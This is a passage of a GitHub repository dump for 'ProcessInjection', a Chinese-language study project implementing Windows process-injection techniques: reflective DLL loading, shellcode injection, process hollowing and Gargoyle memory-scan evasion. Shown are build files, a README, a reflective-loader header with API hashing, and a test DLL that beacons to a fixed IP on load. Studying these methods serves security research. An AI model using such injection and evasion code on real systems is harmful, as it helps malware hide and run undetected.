45 | {6DF3715B-102F-4B2F-8A47-F954478A017B}.Debug|x86.Build.0 = Debug|Win32
46 | {6DF3715B-102F-4B2F-8A47-F954478A017B}.Release|x64.ActiveCfg = Release|x64
47 | {6DF3715B-102F-4B2F-8A47-F954478A017B}.Release|x64.Build.0 = Release|x64
48 | {6DF3715B-102F-4B2F-8A47-F954478A017B}.Release|x86.ActiveCfg = Release|Win32
49 | {6DF3715B-102F-4B2F-8A47-F954478A017B}.Release|x86.Build.0 = Release|Win32
50 | {0FD4C0C2-380E-476F-8EAA-DB5CC1971D60}.Debug|x64.ActiveCfg = Debug|x64
51 | {0FD4C0C2-380E-476F-8EAA-DB5CC1971D60}.Debug|x64.Build.0 = Debug|x64
52 | {0FD4C0C2-380E-476F-8EAA-DB5CC1971D60}.Debug|x86.ActiveCfg = Debug|Win32
53 | {0FD4C0C2-380E-476F-8EAA-DB5CC1971D60}.Debug|x86.Build.0 = Debug|Win32
54 | {0FD4C0C2-380E-476F-8EAA-DB5CC1971D60}.Release|x64.ActiveCfg = Release|x64
55 | {0FD4C0C2-380E-476F-8EAA-DB5CC1971D60}.Release|x64.Build.0 = Release|x64
56 | {0FD4C0C2-380E-476F-8EAA-DB5CC1971D60}.Release|x86.ActiveCfg = Release|Win32
57 | {0FD4C0C2-380E-476F-8EAA-DB5CC1971D60}.Release|x86.Build.0 = Release|Win32
58 | {974E1B91-0F7A-4139-9DE0-4617A02EA4F3}.Debug|x64.ActiveCfg = Debug|x64
59 | {974E1B91-0F7A-4139-9DE0-4617A02EA4F3}.Debug|x64.Build.0 = Debug|x64
60 | {974E1B91-0F7A-4139-9DE0-4617A02EA4F3}.Debug|x86.ActiveCfg = Debug|Win32
61 | {974E1B91-0F7A-4139-9DE0-4617A02EA4F3}.Debug|x86.Build.0 = Debug|Win32
62 | {974E1B91-0F7A-4139-9DE0-4617A02EA4F3}.Release|x64.ActiveCfg = Release|x64
63 | {974E1B91-0F7A-4139-9DE0-4617A02EA4F3}.Release|x64.Build.0 = Release|x64
64 | {974E1B91-0F7A-4139-9DE0-4617A02EA4F3}.Release|x86.ActiveCfg = Release|Win32
65 | {974E1B91-0F7A-4139-9DE0-4617A02EA4F3}.Release|x86.Build.0 = Release|Win32
66 | {3AD41A2B-0A0F-41C3-AC4C-1A052BF902AB}.Debug|x64.ActiveCfg = Debug|x64
67 | {3AD41A2B-0A0F-41C3-AC4C-1A052BF902AB}.Debug|x64.Build.0 = Debug|x64
68 | {3AD41A2B-0A0F-41C3-AC4C-1A052BF902AB}.Debug|x86.ActiveCfg = Debug|Win32
69 | {3AD41A2B-0A0F-41C3-AC4C-1A052BF902AB}.Debug|x86.Build.0 = Debug|Win32
70 | {3AD41A2B-0A0F-41C3-AC4C-1A052BF902AB}.Release|x64.ActiveCfg = Release|x64
71 | {3AD41A2B-0A0F-41C3-AC4C-1A052BF902AB}.Release|x64.Build.0 = Release|x64
72 | {3AD41A2B-0A0F-41C3-AC4C-1A052BF902AB}.Release|x86.ActiveCfg = Release|Win32
73 | {3AD41A2B-0A0F-41C3-AC4C-1A052BF902AB}.Release|x86.Build.0 = Release|Win32
74 | {CEFFB8A5-3748-4AB5-AFAC-AA79F6BF5977}.Debug|x64.ActiveCfg = Debug|x64
75 | {CEFFB8A5-3748-4AB5-AFAC-AA79F6BF5977}.Debug|x64.Build.0 = Debug|x64
76 | {CEFFB8A5-3748-4AB5-AFAC-AA79F6BF5977}.Debug|x86.ActiveCfg = Debug|Win32
77 | {CEFFB8A5-3748-4AB5-AFAC-AA79F6BF5977}.Debug|x86.Build.0 = Debug|Win32
78 | {CEFFB8A5-3748-4AB5-AFAC-AA79F6BF5977}.Release|x64.ActiveCfg = Release|x64
79 | {CEFFB8A5-3748-4AB5-AFAC-AA79F6BF5977}.Release|x64.Build.0 = Release|x64
80 | {CEFFB8A5-3748-4AB5-AFAC-AA79F6BF5977}.Release|x86.ActiveCfg = Release|Win32
81 | {CEFFB8A5-3748-4AB5-AFAC-AA79F6BF5977}.Release|x86.Build.0 = Release|Win32
82 | {9724121A-8D51-4686-BD83-45567A5E4229}.Debug|x64.ActiveCfg = Debug|x64
83 | {9724121A-8D51-4686-BD83-45567A5E4229}.Debug|x64.Build.0 = Debug|x64
84 | {9724121A-8D51-4686-BD83-45567A5E4229}.Debug|x86.ActiveCfg = Debug|Win32
85 | {9724121A-8D51-4686-BD83-45567A5E4229}.Debug|x86.Build.0 = Debug|Win32
86 | {9724121A-8D51-4686-BD83-45567A5E4229}.Release|x64.ActiveCfg = Release|x64
87 | {9724121A-8D51-4686-BD83-45567A5E4229}.Release|x64.Build.0 = Release|x64
88 | {9724121A-8D51-4686-BD83-45567A5E4229}.Release|x86.ActiveCfg = Release|Win32
89 | {9724121A-8D51-4686-BD83-45567A5E4229}.Release|x86.Build.0 = Release|Win32
90 | {90E2E935-7557-4AFB-AD9E-B14EC84A243A}.Debug|x64.ActiveCfg = Debug|x64
91 | {90E2E935-7557-4AFB-AD9E-B14EC84A243A}.Debug|x64.Build.0 = Debug|x64
92 | {90E2E935-7557-4AFB-AD9E-B14EC84A243A}.Debug|x86.ActiveCfg = Debug|Win32
93 | {90E2E935-7557-4AFB-AD9E-B14EC84A243A}.Debug|x86.Build.0 = Debug|Win32
94 | {90E2E935-7557-4AFB-AD9E-B14EC84A243A}.Release|x64.ActiveCfg = Release|x64
95 | {90E2E935-7557-4AFB-AD9E-B14EC84A243A}.Release|x64.Build.0 = Release|x64
96 | {90E2E935-7557-4AFB-AD9E-B14EC84A243A}.Release|x86.ActiveCfg = Release|Win32
97 | {90E2E935-7557-4AFB-AD9E-B14EC84A243A}.Release|x86.Build.0 = Release|Win32
98 | {25F8D1B0-3C56-42EC-84AB-B4A01932DF51}.Debug|x64.ActiveCfg = Debug|x64
99 | {25F8D1B0-3C56-42EC-84AB-B4A01932DF51}.Debug|x64.Build.0 = Debug|x64
100 | {25F8D1B0-3C56-42EC-84AB-B4A01932DF51}.Debug|x86.ActiveCfg = Debug|Win32
101 | {25F8D1B0-3C56-42EC-84AB-B4A01932DF51}.Debug|x86.Build.0 = Debug|Win32
102 | {25F8D1B0-3C56-42EC-84AB-B4A01932DF51}.Release|x64.ActiveCfg = Release|x64
103 | {25F8D1B0-3C56-42EC-84AB-B4A01932DF51}.Release|x64.Build.0 = Release|x64
104 | {25F8D1B0-3C56-42EC-84AB-B4A01932DF51}.Release|x86.ActiveCfg = Release|Win32
105 | {25F8D1B0-3C56-42EC-84AB-B4A01932DF51}.Release|x86.Build.0 = Release|Win32
106 | {45525617-1157-4230-8B6C-C559702469DF}.Debug|x64.ActiveCfg = Debug|x64
107 | {45525617-1157-4230-8B6C-C559702469DF}.Debug|x64.Build.0 = Debug|x64
108 | {45525617-1157-4230-8B6C-C559702469DF}.Debug|x86.ActiveCfg = Debug|Win32
109 | {45525617-1157-4230-8B6C-C559702469DF}.Debug|x86.Build.0 = Debug|Win32
110 | {45525617-1157-4230-8B6C-C559702469DF}.Release|x64.ActiveCfg = Release|x64
111 | {45525617-1157-4230-8B6C-C559702469DF}.Release|x64.Build.0 = Release|x64
112 | {45525617-1157-4230-8B6C-C559702469DF}.Release|x86.ActiveCfg = Release|Win32
113 | {45525617-1157-4230-8B6C-C559702469DF}.Release|x86.Build.0 = Release|Win32
114 | EndGlobalSection
115 | GlobalSection(SolutionProperties) = preSolution
116 | HideSolutionNode = FALSE
117 | EndGlobalSection
118 | EndGlobal
119 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # **ProcessInjection**
2 |
3 | # 一些进程注入方法的实现及分析,分析在:[看雪论坛](https://bbs.pediy.com/user-703263.htm)
4 |
5 |
6 | ## **已完成**:
7 |
8 | 1. **Classic Injection**
9 | * CommonInjection
10 | * InjectionDLL
11 | * DLLTest
12 | 2. **Shellcode Injection**
13 | * ShellcodeInjdection
14 | > x64,shellcode使用msf生成。
15 | 3. **Reflection Injection**
16 | * ReflectiveDLLInjection
17 | * ReflectiveDLL
18 | * ReflectiveDLLPEForm
19 | >代码参考:https://github.com/stephenfewer/ReflectiveDLLInjection
20 | >为方便调试,该工程是在外部实现的对DLL的解析,其实已经与下一个项目相同。
21 |
22 |
23 | 4. **MEMORY MODULE**
24 |
25 | * Memory Module
26 | * MemroyInjectionDLL
27 | >使用了Reflection Injection的代码,对部分代码进行了修改。
28 | >参考:https://github.com/fancycode/MemoryModule
29 |
30 |
31 | 5. **Process Hollowing(冷注入)**
32 |
33 | * EXEPayload
34 | * HollowingDropper
35 | >参考:https://github.com/m0n0ph1/Process-Hollowing
36 | 在原项目的基础上,重写了项目,支持x86和x64
37 | "热"注入失败,以后再尝试。给出文章链接:
38 |
39 | 6. **Gargoyle(石像鬼)**
40 | * Gargoyle
41 | >参考:https://jlospinoso.github.io/security/assembly/c/cpp/developing/software/2017/03/04/gargoyle-memory-analysis-evasion.html
42 | >简介:该项目是一种对内存扫描逃避技术的PoC。只支持x86,x64下没有尝试更改。
43 |
44 |
45 | ## **进行中**:
46 |
47 | + Process Hollowing(热注入)
48 | >http://riscy.business/2017/11/bypassing-modern-process-hollowing-detection/
49 |
50 | >***“images”文件夹是在学习过程中,会遇到的一些数据结构的可视化图片,方便查阅相关结构。***
51 |
--------------------------------------------------------------------------------
/ReflectiveDLL/Debug/ReflectiveDLL.log:
--------------------------------------------------------------------------------
1 | stdafx.cpp
2 | dllmain.cpp
3 | ReflectiveDLL.cpp
4 | d:\users\sudo\documents\github\processinjection\reflectivedll\reflectivedll.cpp(70): error C3861: '__readgsqword': identifier not found
5 |
--------------------------------------------------------------------------------
/ReflectiveDLL/Debug/ReflectiveDLL.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/ReflectiveDLL/Debug/ReflectiveDLL.tlog/CL.command.1.tlog
--------------------------------------------------------------------------------
/ReflectiveDLL/Debug/ReflectiveDLL.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/ReflectiveDLL/Debug/ReflectiveDLL.tlog/CL.read.1.tlog
--------------------------------------------------------------------------------
/ReflectiveDLL/Debug/ReflectiveDLL.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/ReflectiveDLL/Debug/ReflectiveDLL.tlog/CL.write.1.tlog
--------------------------------------------------------------------------------
/ReflectiveDLL/Debug/ReflectiveDLL.tlog/ReflectiveDLL.lastbuildstate:
--------------------------------------------------------------------------------
1 | #TargetFrameworkVersion=v4.0:PlatformToolSet=v140:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=8.1
2 | Debug|Win32|C:\Users\sudo\Desktop\ReflectiveDLLPEForm\|
3 |
--------------------------------------------------------------------------------
/ReflectiveDLL/Debug/ReflectiveDLL.tlog/unsuccessfulbuild:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/ReflectiveDLL/Debug/ReflectiveDLL.tlog/unsuccessfulbuild
--------------------------------------------------------------------------------
/ReflectiveDLL/Debug/vc140.idb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/ReflectiveDLL/Debug/vc140.idb
--------------------------------------------------------------------------------
/ReflectiveDLL/Debug/vc140.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/ReflectiveDLL/Debug/vc140.pdb
--------------------------------------------------------------------------------
/ReflectiveDLL/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | DYNAMIC LINK LIBRARY : ReflectiveDLL Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this ReflectiveDLL DLL for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your ReflectiveDLL application.
9 |
10 |
11 | ReflectiveDLL.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | ReflectiveDLL.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | ReflectiveDLL.cpp
25 | This is the main DLL source file.
26 |
27 | When created, this DLL does not export any symbols. As a result, it
28 | will not produce a .lib file when it is built. If you wish this project
29 | to be a project dependency of some other project, you will either need to
30 | add code to export some symbols from the DLL so that an export library
31 | will be produced, or you can set the Ignore Input Library property to Yes
32 | on the General propert page of the Linker folder in the project's Property
33 | Pages dialog box.
34 |
35 | /////////////////////////////////////////////////////////////////////////////
36 | Other standard files:
37 |
38 | StdAfx.h, StdAfx.cpp
39 | These files are used to build a precompiled header (PCH) file
40 | named ReflectiveDLL.pch and a precompiled types file named StdAfx.obj.
41 |
42 | /////////////////////////////////////////////////////////////////////////////
43 | Other notes:
44 |
45 | AppWizard uses "TODO:" comments to indicate parts of the source code you
46 | should add to or customize.
47 |
48 | /////////////////////////////////////////////////////////////////////////////
49 |
--------------------------------------------------------------------------------
/ReflectiveDLL/ReflectiveDLL.def:
--------------------------------------------------------------------------------
1 | LIBRARY ReflectiveDLL
2 | EXPORTS
3 | ReflectiveLoader @ 1
--------------------------------------------------------------------------------
/ReflectiveDLL/ReflectiveDLL.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 | Header Files
29 |
30 |
31 |
32 |
33 | Source Files
34 |
35 |
36 | Source Files
37 |
38 |
39 | Source Files
40 |
41 |
42 |
43 |
44 | Source Files
45 |
46 |
47 |
--------------------------------------------------------------------------------
/ReflectiveDLL/ReflectiveLoader.h:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | typedef HMODULE(WINAPI * LOADLIBRARYA)(LPCSTR);
5 | typedef FARPROC(WINAPI * GETPROCADDRESS)(HMODULE, LPCSTR);
6 | typedef LPVOID(WINAPI * VIRTUALALLOC)(LPVOID, SIZE_T, DWORD, DWORD);
7 | typedef DWORD(NTAPI * NTFLUSHINSTRUCTIONCACHE)(HANDLE, PVOID, ULONG);
8 | typedef BOOL(WINAPI * DLLMAIN)(HINSTANCE, DWORD, LPVOID);
9 | #define KERNEL32DLL_HASH 0x6A4ABC5B
10 | #define NTDLLDLL_HASH 0x3CFA685D
11 |
12 | #define LOADLIBRARYA_HASH 0xEC0E4E8E
13 | #define GETPROCADDRESS_HASH 0x7C0DFCAA
14 | #define VIRTUALALLOC_HASH 0x91AFCA54
15 | #define NTFLUSHINSTRUCTIONCACHE_HASH 0x534C0AB8
16 |
17 |
18 | //ReflectiveDLLInjection.h
19 | #define DEREF( name )*(UINT_PTR *)(name)
20 | #define DEREF_64( name )*(DWORD64 *)(name)
21 | #define DEREF_32( name )*(DWORD *)(name)
22 | #define DEREF_16( name )*(WORD *)(name)
23 | #define DEREF_8( name )*(BYTE *)(name)
24 |
25 | #define HASH_KEY 13
26 | #pragma intrinsic( _rotr )
27 | __forceinline DWORD ror(DWORD d)
28 | {
29 | return _rotr(d, HASH_KEY);
30 | }
31 |
32 | __forceinline DWORD hash(char * c)
33 | {
34 | register DWORD h = 0;
35 | do
36 | {
37 | h = ror(h);
38 | h += *c;
39 | } while (*++c);
40 |
41 | return h;
42 | }
43 |
44 | typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes
45 | {
46 | struct _PEB_FREE_BLOCK * pNext;
47 | DWORD dwSize;
48 | } PEB_FREE_BLOCK, *PPEB_FREE_BLOCK;
49 |
50 |
51 | typedef struct _UNICODE_STR
52 | {
53 | USHORT Length;
54 | USHORT MaximumLength;
55 | PWSTR pBuffer;
56 | } UNICODE_STR, *PUNICODE_STR;
57 |
58 |
59 | typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes
60 | {
61 | DWORD dwLength;
62 | DWORD dwInitialized;
63 | LPVOID lpSsHandle;
64 | LIST_ENTRY InLoadOrderModuleList;
65 | LIST_ENTRY InMemoryOrderModuleList;
66 | LIST_ENTRY InInitializationOrderModuleList;
67 | LPVOID lpEntryInProgress;
68 | } PEB_LDR_DATA, *PPEB_LDR_DATA;
69 |
70 |
71 | typedef struct _RTL_USER_PROCESS_PARAMETERS {
72 | BYTE Reserved1[16];
73 | PVOID Reserved2[10];
74 | UNICODE_STR ImagePathName;
75 | UNICODE_STR CommandLine;
76 | } RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;
77 | typedef struct __PEB // 65 elements, 0x210 bytes
78 | {
79 | //BYTE bInheritedAddressSpace;
80 | //BYTE bReadImageFileExecOptions;
81 | //BYTE bBeingDebugged;
82 | //BYTE bSpareBool;
83 | //LPVOID lpMutant;
84 | //LPVOID lpImageBaseAddress;
85 | //PPEB_LDR_DATA pLdr;
86 | //LPVOID lpProcessParameters;
87 | //LPVOID lpSubSystemData;
88 | //LPVOID lpProcessHeap;
89 | //PRTL_CRITICAL_SECTION pFastPebLock;
90 | //LPVOID lpFastPebLockRoutine;
91 | //LPVOID lpFastPebUnlockRoutine;
92 | //DWORD dwEnvironmentUpdateCount;
93 | //LPVOID lpKernelCallbackTable;
94 | //DWORD dwSystemReserved;
95 | //DWORD dwAtlThunkSListPtr32;
96 | //PPEB_FREE_BLOCK pFreeList;
97 | //DWORD dwTlsExpansionCounter;
98 | //LPVOID lpTlsBitmap;
99 | //DWORD dwTlsBitmapBits[2];
100 | //LPVOID lpReadOnlySharedMemoryBase;
101 | //LPVOID lpReadOnlySharedMemoryHeap;
102 | //LPVOID lpReadOnlyStaticServerData;
103 | //LPVOID lpAnsiCodePageData;
104 | //LPVOID lpOemCodePageData;
105 | //LPVOID lpUnicodeCaseTableData;
106 | //DWORD dwNumberOfProcessors;
107 | //DWORD dwNtGlobalFlag;
108 | //LARGE_INTEGER liCriticalSectionTimeout;
109 | //DWORD dwHeapSegmentReserve;
110 | //DWORD dwHeapSegmentCommit;
111 | //DWORD dwHeapDeCommitTotalFreeThreshold;
112 | //DWORD dwHeapDeCommitFreeBlockThreshold;
113 | //DWORD dwNumberOfHeaps;
114 | //DWORD dwMaximumNumberOfHeaps;
115 | //LPVOID lpProcessHeaps;
116 | //LPVOID lpGdiSharedHandleTable;
117 | //LPVOID lpProcessStarterHelper;
118 | //DWORD dwGdiDCAttributeList;
119 | //LPVOID lpLoaderLock;
120 | //DWORD dwOSMajorVersion;
121 | //DWORD dwOSMinorVersion;
122 | //WORD wOSBuildNumber;
123 | //WORD wOSCSDVersion;
124 | //DWORD dwOSPlatformId;
125 | //DWORD dwImageSubsystem;
126 | //DWORD dwImageSubsystemMajorVersion;
127 | //DWORD dwImageSubsystemMinorVersion;
128 | //DWORD dwImageProcessAffinityMask;
129 | //DWORD dwGdiHandleBuffer[34];
130 | //LPVOID lpPostProcessInitRoutine;
131 | //LPVOID lpTlsExpansionBitmap;
132 | //DWORD dwTlsExpansionBitmapBits[32];
133 | //DWORD dwSessionId;
134 | //ULARGE_INTEGER liAppCompatFlags;
135 | //ULARGE_INTEGER liAppCompatFlagsUser;
136 | //LPVOID lppShimData;
137 | //LPVOID lpAppCompatInfo;
138 | //UNICODE_STR usCSDVersion;
139 | //LPVOID lpActivationContextData;
140 | //LPVOID lpProcessAssemblyStorageMap;
141 | //LPVOID lpSystemDefaultActivationContextData;
142 | //LPVOID lpSystemAssemblyStorageMap;
143 | //DWORD dwMinimumStackCommit;
144 | BYTE Reserved1[2];
145 | BYTE BeingDebugged;
146 | BYTE Reserved2[21];
147 | PPEB_LDR_DATA pLdr;
148 | PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
149 | BYTE Reserved3[520];
150 | //PPS_POST_PROCESS_INIT_ROUTINE PostProcessInitRoutine;
151 | BYTE Reserved4[136];
152 | ULONG SessionId;
153 | } _PEB, *_PPEB;
154 |
155 | // WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY
156 | //__declspec( align(8) )
157 | typedef struct _LDR_DATA_TABLE_ENTRY
158 | {
159 | //LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry.
160 | LIST_ENTRY InMemoryOrderModuleList;
161 | LIST_ENTRY InInitializationOrderModuleList;
162 | PVOID DllBase;
163 | PVOID EntryPoint;
164 | ULONG SizeOfImage;
165 | UNICODE_STR FullDllName;
166 | UNICODE_STR BaseDllName;
167 | ULONG Flags;
168 | SHORT LoadCount;
169 | SHORT TlsIndex;
170 | LIST_ENTRY HashTableEntry;
171 | ULONG TimeDateStamp;
172 | } LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
173 |
174 |
175 |
176 | typedef struct
177 | {
178 | WORD offset : 12;
179 | WORD type : 4;
180 | } IMAGE_RELOC, *PIMAGE_RELOC;
181 | #ifdef __cplusplus
182 | extern "C" {
183 | #endif
184 |
185 | ULONG_PTR WINAPI ReflectiveLoader(ULONG_PTR callAddress);
186 |
187 | #ifdef __cplusplus
188 | }
189 | #endif
190 |
--------------------------------------------------------------------------------
/ReflectiveDLL/dllmain.cpp:
--------------------------------------------------------------------------------
1 | // dllmain.cpp : Defines the entry point for the DLL application.
2 | #include "ReflectiveLoader.h"
3 | #include
4 | #pragma comment(lib,"Ws2_32.lib")
5 | #define DLL_QUERY_HMODULE 6
6 | extern HINSTANCE hAppInstance;
7 | DWORD dwThreadId;
8 | void TryConnect()
9 | {
10 | WSADATA wsa;
11 | if (WSAStartup(MAKEWORD(1, 1), &wsa) != 0)
12 | {
13 | return;
14 | }
15 | SOCKET m_socket = socket(AF_INET, SOCK_STREAM, 0);
16 | SOCKADDR_IN SocketSendIn;
17 | SocketSendIn.sin_family = AF_INET;
18 | SocketSendIn.sin_addr.S_un.S_addr = inet_addr("114.114.114.114");
19 | SocketSendIn.sin_port = htons(53);
20 | connect(m_socket, (SOCKADDR*)&SocketSendIn, sizeof(SOCKADDR));
21 | closesocket(m_socket);
22 | WSACleanup();
23 | }
24 | void WINAPI inj()
25 | {
26 | while (1)
27 | {
28 | TryConnect();
29 | Sleep(5000);
30 | }
31 | }
32 | BOOL APIENTRY DllMain( HINSTANCE hinstDLL,
33 | DWORD ul_reason_for_call,
34 | LPVOID lpReserved
35 | )
36 | {
37 | BOOL bReturnValue = TRUE;
38 | switch (ul_reason_for_call)
39 | {
40 | case DLL_QUERY_HMODULE:
41 | if (lpReserved != NULL)
42 | *(HMODULE*)lpReserved = hAppInstance;
43 | break;
44 | case DLL_PROCESS_ATTACH:
45 | hAppInstance = hinstDLL;
46 | CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)inj, NULL, 0, &dwThreadId);
47 | break;
48 | case DLL_THREAD_ATTACH:
49 | case DLL_THREAD_DETACH:
50 | case DLL_PROCESS_DETACH:
51 | break;
52 | }
53 | return TRUE;
54 | }
55 |
56 |
--------------------------------------------------------------------------------
/ReflectiveDLL/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // ReflectiveDLL.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/ReflectiveDLL/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
11 | // Windows Header Files:
12 | #include
13 | #include
14 |
15 |
16 | // TODO: reference additional headers your program requires here
17 |
--------------------------------------------------------------------------------
/ReflectiveDLL/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/ReflectiveDLL/x64/Debug/ReflectiveDLL.Build.CppClean.log:
--------------------------------------------------------------------------------
1 | d:\users\sudo\documents\github\processinjection\reflectivedll\x64\debug\reflectivedll.pch
2 | d:\users\sudo\documents\github\processinjection\reflectivedll\x64\debug\vc140.pdb
3 | d:\users\sudo\documents\github\processinjection\reflectivedll\x64\debug\vc140.idb
4 | d:\users\sudo\documents\github\processinjection\reflectivedll\x64\debug\stdafx.obj
5 | d:\users\sudo\documents\github\processinjection\reflectivedll\x64\debug\dllmain.obj
6 | d:\users\sudo\documents\github\processinjection\reflectivedll\x64\debug\reflectivedll.obj
7 | c:\users\sudo\desktop\reflectivedllpeform\x64\debug\reflectivedll.ilk
8 | c:\users\sudo\desktop\reflectivedllpeform\x64\debug\reflectivedll.dll
9 | c:\users\sudo\desktop\reflectivedllpeform\x64\debug\reflectivedll.pdb
10 | c:\users\sudo\desktop\reflectivedllpeform\x64\debug\reflectivedll.lib
11 | c:\users\sudo\desktop\reflectivedllpeform\x64\debug\reflectivedll.exp
12 | d:\users\sudo\documents\github\processinjection\reflectivedll\x64\debug\reflectivedll.tlog\cl.command.1.tlog
13 | d:\users\sudo\documents\github\processinjection\reflectivedll\x64\debug\reflectivedll.tlog\cl.read.1.tlog
14 | d:\users\sudo\documents\github\processinjection\reflectivedll\x64\debug\reflectivedll.tlog\cl.write.1.tlog
15 | d:\users\sudo\documents\github\processinjection\reflectivedll\x64\debug\reflectivedll.tlog\link.command.1.tlog
16 | d:\users\sudo\documents\github\processinjection\reflectivedll\x64\debug\reflectivedll.tlog\link.read.1.tlog
17 | d:\users\sudo\documents\github\processinjection\reflectivedll\x64\debug\reflectivedll.tlog\link.write.1.tlog
18 | d:\users\sudo\documents\github\processinjection\reflectivedll\x64\debug\reflectivedll.tlog\reflectivedll.write.1u.tlog
19 |
--------------------------------------------------------------------------------
/ReflectiveDLL/x64/Debug/ReflectiveDLL.log:
--------------------------------------------------------------------------------
1 | stdafx.cpp
2 | dllmain.cpp
3 | ReflectiveDLL.cpp
4 | Creating library C:\Users\sudo\Desktop\ReflectiveDLLPEForm\x64\Debug\ReflectiveDLL.lib and object C:\Users\sudo\Desktop\ReflectiveDLLPEForm\x64\Debug\ReflectiveDLL.exp
5 | ReflectiveDLL.vcxproj -> C:\Users\sudo\Desktop\ReflectiveDLLPEForm\x64\Debug\ReflectiveDLL.dll
6 | ReflectiveDLL.vcxproj -> C:\Users\sudo\Desktop\ReflectiveDLLPEForm\x64\Debug\ReflectiveDLL.pdb (Full PDB)
7 |
--------------------------------------------------------------------------------
/ReflectiveDLL/x64/Debug/ReflectiveDLL.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/ReflectiveDLL/x64/Debug/ReflectiveDLL.tlog/CL.command.1.tlog
--------------------------------------------------------------------------------
/ReflectiveDLL/x64/Debug/ReflectiveDLL.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/ReflectiveDLL/x64/Debug/ReflectiveDLL.tlog/CL.read.1.tlog
--------------------------------------------------------------------------------
/ReflectiveDLL/x64/Debug/ReflectiveDLL.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/ReflectiveDLL/x64/Debug/ReflectiveDLL.tlog/CL.write.1.tlog
--------------------------------------------------------------------------------
/ReflectiveDLL/x64/Debug/ReflectiveDLL.tlog/ReflectiveDLL.lastbuildstate:
--------------------------------------------------------------------------------
1 | #TargetFrameworkVersion=v4.0:PlatformToolSet=v140:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=8.1
2 | Debug|x64|C:\Users\sudo\Desktop\ReflectiveDLLPEForm\|
3 |
--------------------------------------------------------------------------------
/ReflectiveDLL/x64/Debug/ReflectiveDLL.tlog/ReflectiveDLL.write.1u.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/ReflectiveDLL/x64/Debug/ReflectiveDLL.tlog/ReflectiveDLL.write.1u.tlog
--------------------------------------------------------------------------------
/ReflectiveDLL/x64/Debug/ReflectiveDLL.tlog/link.command.1.tlog:
